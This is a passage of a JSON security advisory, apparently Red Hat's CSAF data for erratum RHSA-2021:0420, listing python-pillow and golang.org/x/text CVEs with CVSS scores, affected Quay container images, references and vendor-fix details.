"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", 
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-10378" }, { "category": "external", "summary": "RHBZ#1852832", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1852832" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-10378", "url": "https://www.cve.org/CVERecord?id=CVE-2020-10378" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-10378", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-10378" } ], "release_date": "2020-06-25T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-04T16:14:00+00:00", "details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", 
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0420" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "products": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", 
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "python-pillow: an out-of-bounds read in libImaging/PcxDecode.c can occur when reading PCX files" }, { "cve": "CVE-2020-10379", "cwe": { "id": "CWE-120", "name": "Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)" }, "discovery_date": "2020-06-25T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1852836" } ], "notes": [ { "category": "description", "text": "In Pillow before 7.1.0, there are two Buffer Overflows in libImaging/TiffDecode.c.", "title": "Vulnerability description" }, { "category": "summary", "text": "python-pillow: two buffer overflows in libImaging/TiffDecode.c due to small buffers allocated in ImagingLibTiffDecode()", "title": "Vulnerability summary" }, { "category": "other", "text": "While python-pillow is listed as a dependency of Red Hat Quay, it is not used by the application.\n\nThis issue did not affect the versions of 
python-pillow as shipped with Red Hat Enterprise Linux 5, 6, 7, and 8 as they provide an older version of the code which does not include the vulnerable code.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": 
"https://access.redhat.com/security/cve/CVE-2020-10379" }, { "category": "external", "summary": "RHBZ#1852836", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1852836" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-10379", "url": "https://www.cve.org/CVERecord?id=CVE-2020-10379" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-10379", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-10379" } ], "release_date": "2020-06-25T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-04T16:14:00+00:00", "details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", 
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0420" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", 
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "python-pillow: two buffer overflows in libImaging/TiffDecode.c due to small buffers allocated in ImagingLibTiffDecode()" }, { "cve": "CVE-2020-10994", "cwe": { "id": "CWE-125", "name": "Out-of-bounds Read" }, "discovery_date": "2020-06-25T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1852820" } ], "notes": [ { "category": "description", "text": "An out-of-bounds read flaw was found in python-pillow in the way JP2 images are parsed. An application that uses python-pillow to decode untrusted images may be vulnerable to this issue. This flaw allows an attacker to read data. The highest threat from this vulnerability is to confidentiality.", "title": "Vulnerability description" }, { "category": "summary", "text": "python-pillow: multiple out-of-bounds reads via a crafted JP2 file", "title": "Vulnerability summary" }, { "category": "other", "text": "This issue did not affect the versions of python-pillow and python-imaging as shipped with Red Hat Enterprise Linux 5, 6, and 7 as they did not include the JP2 image parser, where the flaw lies.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", 
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-10994" }, { "category": "external", "summary": "RHBZ#1852820", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1852820" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-10994", "url": "https://www.cve.org/CVERecord?id=CVE-2020-10994" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-10994", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-10994" } ], "release_date": "2020-06-25T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-04T16:14:00+00:00", "details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ 
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0420" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "products": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", 
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "python-pillow: multiple out-of-bounds reads via a crafted JP2 file" }, { "cve": "CVE-2020-11538", "cwe": { "id": "CWE-122", "name": "Heap-based Buffer Overflow" }, "discovery_date": "2020-07-01T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1852814" } ], "notes": [ { "category": "description", "text": "An out-of-bounds read/write flaw was found in python-pillow, in the way SGI RLE images are decoded. An application that uses python-pillow to decode untrusted images may be vulnerable. This flaw allows an attacker to crash the application or potentially execute code on the system. 
The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "python-pillow: out-of-bounds reads/writes in the parsing of SGI image files in expandrow/expandrow2", "title": "Vulnerability summary" }, { "category": "other", "text": "This issue did not affect the versions of python-pillow and python-imaging as shipped with Red Hat Enterprise Linux 5, 6, and 7 as they did not include the SGI RLE image decoder, where the flaw lies.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", 
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-11538" }, { "category": "external", "summary": "RHBZ#1852814", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1852814" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-11538", "url": "https://www.cve.org/CVERecord?id=CVE-2020-11538" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-11538", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11538" } ], "release_date": "2020-07-01T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-04T16:14:00+00:00", "details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", 
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0420" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64", "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64", "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64", "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64", 
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64", "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64", "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64", "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64", "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64", "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "python-pillow: out-of-bounds reads/writes in the parsing of SGI image files in expandrow/expandrow2" }, { "cve": "CVE-2020-14040", "cwe": { "id": "CWE-835", "name": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)" }, "discovery_date": "2020-06-17T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1853652" } ], "notes": [ { "category": "description", "text": "A denial of service vulnerability was found in the golang.org/x/text library. A library or application must use one of the vulnerable functions, such as unicode.Transform, transform.String, or transform.Byte, to be susceptible to this vulnerability. 
If an attacker is able to supply specific characters or strings to the vulnerable application, there is the potential to cause an infinite loop to occur using more memory, resulting in a denial of service.", "title": "Vulnerability description" }, { "category": "summary", "text": "golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash", "title": "Vulnerability summary" }, { "category": "other", "text": "* OpenShift ServiceMesh (OSSM) 1.0 is Out Of Support Scope (OOSS) for Moderate and Low impact vulnerabilities. Jaeger was packaged with ServiceMesh in 1.0, and hence is also marked OOSS, but the Jaeger-Operator is a standalone product and is affected by this vulnerability.\n\n* Because Service Telemetry Framework does not directly use unicode.UTF16, no update will be provided at this time for STF\u0027s sg-core-container.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) 